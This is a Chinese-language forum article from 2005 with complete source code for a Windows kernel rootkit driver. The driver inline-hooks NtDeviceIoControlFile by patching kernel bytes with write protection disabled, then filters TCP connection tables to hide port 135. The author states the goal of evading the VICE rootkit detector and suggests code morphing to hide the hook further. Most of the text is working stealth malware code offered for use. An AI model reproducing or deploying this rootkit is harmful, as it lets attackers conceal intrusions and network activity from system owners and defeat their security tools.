kernel inline hook 绕过vice检测创建时间:2005-11-05 文章属性:原创 文章提交:jqzmb (jqzmb_at_163.com) kernel inline hook 绕过vice检测 uty@uaty zmba@tom.com 在user mode的inline hook比较好用,因为很少有多线程的问题,所以可以采用把API前5字节改为跳转指令到自己的函数中,然后再改回原来的5个字节,调用原函数后在把前5个字节改为跳转指令为下次做好准备,过程大概如下 比如hook API(),我们的函数为myAPI() 修改API()前5字节为jmp xxxx(指向myAPI()), 1 | | 调用API() 2 | | 跳转到myAPI() 3 | | (myAPI()中)改回原来的5字节 4 | | ... 一些操作 5 | | (myAPI()中)调用API() 6 | | .... 一些操作 7 | | (myAPI()中)再次修改API前5字节为jmp xxxx(指向myAPI()) 8 | | 结束 9 这个过程在kernel就不那么方便了,很不稳定,因为系统服务是整个windows都会经常调用,n多线程,如果一个线程调用了被hook的系统服务,当运行到 4--8之间的时候,线程被切换,另一个线程再次调用相同的系统服务时就会出现系统服务没被hook的情况.如果正好在执行到4或8的时候被中断,在其他 线程调用系统服务的时候就可能是BSOD了 :) 如果说是提高irql或block其他线程,总不能每次都那样吧 听说是这样的hook很不稳定,自己倒还没试 过,不知道实际情况到底怎样 看到了Greg Hoglund的migsys.sys 的确是个好程序,里面的hook只需要改写一次就可以一直hook,稳定性很好,我在虚拟机上实验,没问题,不过扁要赶上改写那一次的时候被中断....哎 只能说点背migsys.c里在驱动加载后改写系统服务的前5个字节跳转到自己给出的hook 函数中,拿NtDeviceIoControlFile为例,hook函数为 __declspec(naked) my_function_detour_ntdeviceiocontrolfile() { __asm { // exec missing instructions push ebp mov ebp, esp push 0x01 push dword ptr [ebp+0x2C] // jump to re-entry location in hooked function // this gets 'stamped' with the correct address // at runtime. // // we need to hard-code a far jmp, but the assembler // that comes with the DDK will not poop this out // for us, so we code it manually // jmp FAR 0x08:0xAAAAAAAA _emit 0xEA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0x08 _emit 0x00 } } 注意到 __emit 0xEA __emit 0xAA __emit 0xAA __emit 0xAA __emit 0xAA __emit 0x08 __emit 0x00 这是一句跳转语句 jmp 0008:AAAAAAAA 在驱动开始的时候就会寻找AAAAAAAA,把这里改写为被hook的NtDeviceIoControlFile+8的位置,这样在系统调用NtDeviceIoControlFile直接jmp到my_function_detour_ntdeviceiocontrolfile,接着执行 push ebp,esp push 0x01 push dword ptr [ebp+0x2c] (共8字节,不同版本windows的函数可能会有变化) 接下来jmp到NtDeviceIoControlFile+8,由于my_function_detour_ntdeviceiocontrolfile是__declspec(naked), 所以在进入后堆栈不会被改变,相当于执行了一个完整的NtDeviceIoControlFile.只不过前8个字节执行的地方不同 :> 我们可以在 push ebp前直接做些我们要的操作,不可以用局部变量,调用函数,对传入NtDeviceIoControlFile的参数做处理或者过滤之类的操作. 但对于hook NtDeviceIoControlFile来实现隐藏端口和连接,我们是在调用成功后对结果进行过滤,而在jmp到NtDeviceIoControlFile+8后,我们就交出了程序的控制权.所以必须要让它执行完后再次转到我们的程序里.如果执行后要返回的话,就要用cAll指令,但cAll NtDeviceIoControlFile+8是不行的,被压入栈的返回地址放在了进栈的ebp的后面,乱了.这个办法行不通. 肯定会有不同的方法来完成,我现在只想到了一个,并且希望让编译器帮着做大部分事,,我只用c就好了 ;) 模仿这种: NTSTATUS NTAPI myNtDeviceIoControlFile( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength ) { NTSTATUS rc; rc = NtDeviceIoControlFile( FileHandle, Event, ApcRoutine, ApcContext, IoStatusBlock, IoControlCode, InputBuffer, InputBufferLength, OutputBuffer, OutputBufferLength ); ... } 然后我们可以对返回值做一些操作,就相当在我们的函数里调用了NtDeviceIoControlFile NtDeviceIoControlFile有10个参数,调用时堆栈应该是这个样 Arg10 Arg9 Arg8 Arg7 Arg6 Arg5 Arg4 Arg3 Arg2 Arg1 ret Address 因为在系统调用的时候就已经压好了参数,所以我们的hook函数就不能自己再做了,要声名__declspec(naked),参数要和原函数一致.进入后模拟 cAll NtDeviceIoControlFile __asm { push OutputBufferLength push OutputBuffer push InputBufferLength push InputBuffer push IoControlCode push IoStatusBlock push ApcContext push ApcRoutine push Event push FileHandle } 然后是ret Address,这个需要在运行时确定,用到了病毒中常用的定位的方法: cAll forwArd: bAck: pop eAx ... forwArd: jmp bAck: 得到pop eAx所在的位置 在我们的程序中: __asm { //int 3 jmp forwArd bAck: } __asm { // exec missing instructions push ebp mov ebp, esp push 0x01 push dword ptr [ebp+0x2C] // jump to re-entry location in hooked function // this gets 'stamped' with the correct address // at runtime. // // we need to hard-code a far jmp, but the assembler // that comes with the DDK will not poop this out // for us, so we code it manually // jmp FAR 0x08:0xAAAAAAAA _emit 0xEA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0x08 _emit 0x00 } ////////////////////////// __asm { forwArd: call bAck } 实现了一个完整的cAll NtDeviceIoControlFile :> __declspec(naked) my_function_detour_ntdeviceiocontrolfile(IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength ) { //NTSTATUS rc; 这里不能用局部变量,因为NtDeviceIoControlFile被调用的 环境可不确定,可以用全局变量(我们的Driver用服务的方式加载会在nonpAgedpool中或者直接在nonpAgedPool中申请 //TCP_REQUEST_QUERY_INFORMATION_EX req; //TCPAddrEntry* TcpTable;// = NULL; //TCPAddrExEntry* TcpExTable;// = NULL; //ULONG numconn; //ULONG i; __asm { push ebp mov ebp,esp } //DbgPrint("hooked\n"); __asm { push OutputBufferLength push OutputBuffer push InputBufferLength push InputBuffer push IoControlCode push IoStatusBlock push ApcContext push ApcRoutine push Event push FileHandle } __asm { //int 3 jmp forwArd bAck: } __asm { //popfd //popad // exec missing instructions push ebp mov ebp, esp push 0x01 push dword ptr [ebp+0x2C] // jump to re-entry location in hooked function // this gets 'stamped' with the correct address // at runtime. // // we need to hard-code a far jmp, but the assembler // that comes with the DDK will not poop this out // for us, so we code it manually // jmp FAR 0x08:0xAAAAAAAA _emit 0xEA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0x08 _emit 0x00 } ////////////////////////// __asm { forwArd: call bAck } /* __asm { mov esp,ebp pop ebp ret 0x28 } */ //DbgPrint("once here :>\n"); __asm { mov rc,eax } if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX){ //return(rc); __asm { mov esp,ebp pop ebp mov eax,rc ret 0x28 } } //TcpTable = NULL; //TcpExTable = NULL; if( NT_SUCCESS( rc ) ) { req.ID.toi_entity.tei_entity = CO_TL_ENTITY; req.ID.toi_entity.tei_instance = 0; req.ID.toi_class = INFO_CLASS_PROTOCOL; req.ID.toi_type = INFO_TYPE_PROVIDER; req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID; if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){ numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry); TcpTable = (TCPAddrEntry*)OutputBuffer; for( i=0; i<numconn; i++ ){ if( ntohs(TcpTable[i].tae_ConnLocalPort) == 135 ) { //判断是否是最后一个 if (i != numconn -1){ RtlCopyMemory((TcpTable+i),(TcpTable+i+1),((numconn-i-1)*sizeof(TCPAddrEntry))); numconn--; i--; }else{ numconn--; } } } IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry); //return(rc); __asm { mov esp,ebp pop ebp mov eax,rc ret 0x28 } } } //return(rc); __asm { mov esp,ebp pop ebp mov eax,rc ret 0x28 } } 声名__declspec(naked)的函数是不能用return语句的,因此这个工作得自己做 :> 上面的方法相比直接改SSDT就隐蔽些了,但被vice查出来,太容易被发现,当然可以用变形的方法来替换jmp,比如push xxxx,ret 其他的很多方法,虑到除了变形外还可以把改写的位置放在其他位置上,比如从被hook的函数开始的第8个字节的几个字节改写成jmp xxxx,位置是不固定的,要看具体情况而定,比如 NtDeviceIoControlFile, nt!NtDeviceIoControlFile: 805997c4 55 push ebp 805997c5 8bec mov ebp,esp 805997c7 6a01 push 0x1 805997c9 ff752c push dword ptr [ebp+0x2c] 805997cc ff7528 push dword ptr [ebp+0x28] 805997cf ff7524 push dword ptr [ebp+0x24] 805997d2 ff7520 push dword ptr [ebp+0x20] 805997d5 ff751c push dword ptr [ebp+0x1c] 805997d8 ff7518 push dword ptr [ebp+0x18] 805997db ff7514 push dword ptr [ebp+0x14] 805997de ff7510 push dword ptr [ebp+0x10] 805997e1 ff750c push dword ptr [ebp+0xc] 805997e4 ff7508 push dword ptr [ebp+0x8] 805997e7 e8e731ffff call nt!IopXxxControlFile (8058c9d3) 805997ec 5d pop ebp 805997ed c22800 ret 0x28 805997f0 0f862334ffff jbe nt!IopXxxControlFile+0x570 (8058cc19) ... 前面这么多push 语句都可以用来改成jmp xxxx或类似的语句,直要不让它执行到cAll就行了,,因为一但cAll就做出了很多操作,不好往回改了 比如选定 805997cc ff7528 push dword ptr [ebp+0x28] 805997cf ff7524 push dword ptr [ebp+0x24] 805997d2 ff7520 push dword ptr [ebp+0x20] 这9个字节改写为0xEA, 0x44, 0x33, 0x22, 0x11, 0x08, 0x00, 0x90,0x90 11223344被换成我们的函数的地址,一定要用整数条语句的空间 当调用NtDeviceIoControlFile后跳转到我们的函数时,实际上已经执行了这几条语句了 805997c4 55 push ebp 805997c5 8bec mov ebp,esp 805997c7 6a01 push 0x1 805997c9 ff752c push dword ptr [ebp+0x2c] 所以要执行对应相反的语句来恢复堆栈 __asm { add esp,8 mov esp,ebp pop ebp } 然后和原来的方法一样模拟cAll NtDeviceIoControlFile的过程,把丢掉的语句都补上. 在自己的xp sp1下vice2.0通过,结合变形,效果会更好吧 :> 代码如下: ////////////inline_hook.c/////////////// #include <ntddk.h> #include "hideport_hook_ZwDeviceIoControlFile.h" NTSTATUS rc; TCP_REQUEST_QUERY_INFORMATION_EX req; TCPAddrEntry* TcpTable = NULL; TCPAddrExEntry* TcpExTable = NULL; ULONG numconn; ULONG i; //-------------------------------------------------------------------- NTSYSAPI NTSTATUS NTAPI NtDeviceIoControlFile( IN HANDLE hFile, IN HANDLE hEvent OPTIONAL, IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL, IN PVOID IoApcContext OPTIONAL, OUT PIO_STATUS_BLOCK pIoStatusBlock, IN ULONG DeviceIoControlCode, IN PVOID InBuffer OPTIONAL, IN ULONG InBufferLength, OUT PVOID OutBuffer OPTIONAL, IN ULONG OutBufferLength ); NTSTATUS CheckFunctionBytesNtDeviceIoControlFile() { int i=0; char *p = (char *)NtDeviceIoControlFile; //The beginning of the NtDeviceIoControlFile function //should match: //55 PUSH EBP //8BEC MOV EBP, ESP //6A01 PUSH 01 //FF752C PUSH DWORD PTR [EBP + 2C] char c[] = { 0x55, 0x8B, 0xEC, 0x6A, 0x01, 0xFF, 0x75, 0x2C }; while(i<8) { DbgPrint(" - 0x%02X ", (unsigned char)p[i]); DbgPrint("\n"); if(p[i] != c[i]) { return STATUS_UNSUCCESSFUL; } i++; } return STATUS_SUCCESS; } //-------------------------------------------------------------------- // naked functions have no prolog/epilog code - they are functionally like the // target of a goto statement __declspec(naked) NTAPI my_function_detour_ntdeviceiocontrolfile(IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength ) { //NTSTATUS rc; //TCP_REQUEST_QUERY_INFORMATION_EX req; //TCPAddrEntry* TcpTable;// = NULL; //TCPAddrExEntry* TcpExTable;// = NULL; //ULONG numconn; //ULONG i; __asm { add esp,8 mov esp,ebp pop ebp } __asm { push ebp mov ebp,esp pushad } //DbgPrint("hooked\n"); __asm { push OutputBufferLength push OutputBuffer push InputBufferLength push InputBuffer push IoControlCode push IoStatusBlock push ApcContext push ApcRoutine push Event push FileHandle } __asm { //int 3 jmp forwArd bAck: } __asm { // exec missing instructions push ebp mov ebp, esp push 0x01 push dword ptr [ebp+0x2C] push dword ptr [ebp+0x28] push dword ptr [ebp+0x24] push dword ptr [ebp+0x20] // jump to re-entry location in hooked function // this gets 'stamped' with the correct address // at runtime. // // we need to hard-code a far jmp, but the assembler // that comes with the DDK will not poop this out // for us, so we code it manually // jmp FAR 0x08:0xAAAAAAAA _emit 0xEA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0xAA _emit 0x08 _emit 0x00 } ////////////////////////// __asm { forwArd: call bAck } //DbgPrint("once here :>\n"); __asm { mov rc,eax } if(IoControlCode != IOCTL_TCP_QUERY_INFORMATION_EX){ //return(rc); __asm { popad mov esp,ebp pop ebp mov eax,rc ret 0x28 } } if( NT_SUCCESS( rc ) ) { req.ID.toi_entity.tei_entity = CO_TL_ENTITY; req.ID.toi_entity.tei_instance = 0; req.ID.toi_class = INFO_CLASS_PROTOCOL; req.ID.toi_type = INFO_TYPE_PROVIDER; req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_ID; if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){ numconn = IoStatusBlock->Information/sizeof(TCPAddrEntry); TcpTable = (TCPAddrEntry*)OutputBuffer; for( i=0; i<numconn; i++ ){ if( ntohs(TcpTable[i].tae_ConnLocalPort) == 135 ) { //判断是否是最后一个 if (i != numconn -1){ RtlCopyMemory( (TcpTable+i), (TcpTable+i+1), ((numconn-i-1)*sizeof(TCPAddrEntry)) ); numconn--; i--; }else{ numconn--; } } } IoStatusBlock->Information = numconn*sizeof(TCPAddrEntry); //return(rc); __asm { popad mov esp,ebp pop ebp mov eax,rc ret 0x28 } } req.ID.toi_id = TCP_MIB_ADDRTABLE_ENTRY_EX_ID; if(sizeof(TDIObjectID) == RtlCompareMemory(InputBuffer,&req,sizeof(TDIObjectID))){ numconn = IoStatusBlock->Information/sizeof(TCPAddrExEntry); TcpExTable = (TCPAddrExEntry*)OutputBuffer; for( i=0; i<numconn; i++ ) { if( ntohs(TcpExTable[i].tae_ConnLocalPort) == 135 ) { if (i != numconn){ RtlCopyMemory( (TcpExTable+i), (TcpExTable+i+1), ((numconn-i-1)*sizeof(TCPAddrExEntry)) ); numconn--; i--; }else{ numconn--; } } } IoStatusBlock->Information = numconn*sizeof(TCPAddrExEntry); //return(rc); __asm { popad mov esp,ebp pop ebp mov eax,rc ret 0x28 } } } //return(rc); __asm { popad mov esp,ebp pop ebp mov eax,rc ret 0x28 } } //-------------------------------------------------------------------- VOID DetourFunctionNtDeviceIoControlFile() { char *actual_function = (char *)NtDeviceIoControlFile; unsigned long detour_address; unsigned long reentry_address; int i = 0; // assembles to jmp far 0008:11223344 where 11223344 is address of // our detour function, plus one NOP to align up the patch char newcode[] = { 0xEA, 0x44, 0x33, 0x22, 0x11, 0x08, 0x00, 0x90,0x90 }; // reenter the hooked function at a location past the overwritten opcodes // alignment is, of course, very important here reentry_address = ((unsigned long)NtDeviceIoControlFile) + 17; detour_address = (unsigned long)my_function_detour_ntdeviceiocontrolfile; // stamp in the target address of the far jmp *( (unsigned long *)(&newcode[1]) ) = detour_address; // now, stamp in the return jmp into our detour // function for(i=0;i<200;i++){ if( (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i]) && (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+1]) && (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+2]) && (0xAA == ((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i+3])) { // we found the address 0xAAAAAAAA // stamp it w/ the correct address *( (unsigned long *)(&((unsigned char *)my_function_detour_ntdeviceiocontrolfile)[i]) ) = reentry_address; break; } } //TODO, raise IRQL //overwrite the bytes in the kernel function //to apply the detour jmp _asm { CLI //dissable interrupt MOV EAX, CR0 //move CR0 register into EAX AND EAX, NOT 10000H //disable WP bit MOV CR0, EAX //write register back } for(i=8;i < 17;i++) { actual_function[i] = newcode[i-8]; } _asm { MOV EAX, CR0 //move CR0 register into EAX OR EAX, 10000H //enable WP bit MOV CR0, EAX //write register back STI //enable interrupt } //TODO, drop IRQL } VOID UnDetourFunction() { //TODO! } //-------------------------------------------------------------------- VOID OnUnload( IN PDRIVER_OBJECT DriverObject ) { DbgPrint("My Driver Unloaded!\n"); UnDetourFunction(); } //-------------------------------------------------------------------- NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath ) { DbgPrint("My Driver Loaded!"); // TODO!! theDriverObject->DriverUnload = OnUnload; if(STATUS_SUCCESS != CheckFunctionBytesNtDeviceIoControlFile()){ DbgPrint("Match Failure on NtDeviceIoControlFile!\n"); return STATUS_UNSUCCESSFUL; } DetourFunctionNtDeviceIoControlFile(); return STATUS_SUCCESS; } //-------------------------------------------------------------------- //////////hideport_hook_ZwDeviceIoControlFile.h///////////// #include <ntddk.h> //-------------------------------------------------------------------- NTSYSAPI NTSTATUS NTAPI ZwDeviceIoControlFile( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength ); NTSTATUS NTAPI myZwDeviceIoControlFile( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength ); typedef NTSTATUS (NTAPI *ZWDEVICEIOCONTROLFILE)( IN HANDLE FileHandle, IN HANDLE Event OPTIONAL, IN PIO_APC_ROUTINE ApcRoutine OPTIONAL, IN PVOID ApcContext OPTIONAL, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG IoControlCode, IN PVOID InputBuffer OPTIONAL, IN ULONG InputBufferLength, OUT PVOID OutputBuffer OPTIONAL, IN ULONG OutputBufferLength ); //-------------------------------------------------------------------- // jiurl // from addrconv.cpp #define ntohs(s) ( ( ((s) >> 8) & 0x00FF ) | ( ((s) << 8) & 0xFF00 ) ) // jiurl // from tcpioctl.h tdiinfo.h tdistat.h #define IOCTL_TCP_QUERY_INFORMATION_EX 0x00120003 //* Structure of an entity ID. typedef struct TDIEntityID { ULONG tei_entity; ULONG tei_instance; } TDIEntityID; //* Structure of an object ID. typedef struct TDIObjectID { TDIEntityID toi_entity; ULONG toi_class; ULONG toi_type; ULONG toi_id; } TDIObjectID; #define CONTEXT_SIZE 16 // // QueryInformationEx IOCTL. The return buffer is passed as the OutputBuffer // in the DeviceIoControl request. This structure is passed as the // InputBuffer. // struct tcp_request_query_information_ex { TDIObjectID ID; // object ID to query. ULONG_PTR Context[CONTEXT_SIZE/sizeof(ULONG_PTR)]; // multi-request context. Zeroed // for the first request. }; typedef struct tcp_request_query_information_ex TCP_REQUEST_QUERY_INFORMATION_EX, *PTCP_REQUEST_QUERY_INFORMATION_EX; #define CO_TL_ENTITY 0x400 #define INFO_CLASS_PROTOCOL 0x200 #define INFO_TYPE_PROVIDER 0x100 //-------------------------------------------------------------------- typedef struct TCPSNMPInfo { ULONG tcpsi_RtoAlgorithm; ULONG tcpsi_RtoMin; ULONG tcpsi_RtoMax; ULONG tcpsi_MaxConn; ULONG tcpsi_ActiveOpens; ULONG tcpsi_PassiveOpens; ULONG tcpsi_AttemptFails; ULONG tcpsi_EstabResets; ULONG tcpsi_CurrEstab; ULONG tcpsi_InSegs; ULONG tcpsi_OutSegs; ULONG tcpsi_RetransSegs; ULONG tcpsi_unknown1; ULONG tcpsi_unknown2; ULONG tcpsi_numconn; } TCPSNMPInfo; #define tcpRtoAlgorithm_other 1 // none of the following #define tcpRtoAlgorithm_constant 2 // a constant rto #define tcpRtoAlgorithm_rsre 3 // MIL-STD-1778, Appendix B #define tcpRtoAlgorithm_vanj 4 // Van Jacobson's algorithm #define TCP_MIB_STATS_ID 1 #define TCP_MIB_ADDRTABLE_ENTRY_ID 0x101 #define TCP_MIB_ADDRTABLE_ENTRY_EX_ID 0x102 typedef struct TCPAddrEntry { ULONG tae_ConnState; ULONG tae_ConnLocalAddress; ULONG tae_ConnLocalPort; ULONG tae_ConnRemAddress; ULONG tae_ConnRemPort; } TCPAddrEntry; #define tcpConnState_closed 1 #define tcpConnState_listen 2 #define tcpConnState_synSent 3 #define tcpConnState_synReceived 4 #define tcpConnState_established 5 #define tcpConnState_finWait1 6 #define tcpConnState_finWait2 7 #define tcpConnState_closeWait 8 #define tcpConnState_lastAck 9 #define tcpConnState_closing 10 #define tcpConnState_timeWait 11 #define tcpConnState_deleteTCB 12 typedef struct TCPAddrExEntry { ULONG tae_ConnState; ULONG tae_ConnLocalAddress; ULONG tae_ConnLocalPort; ULONG tae_ConnRemAddress; ULONG tae_ConnRemPort; ULONG pid; } TCPAddrExEntry; |
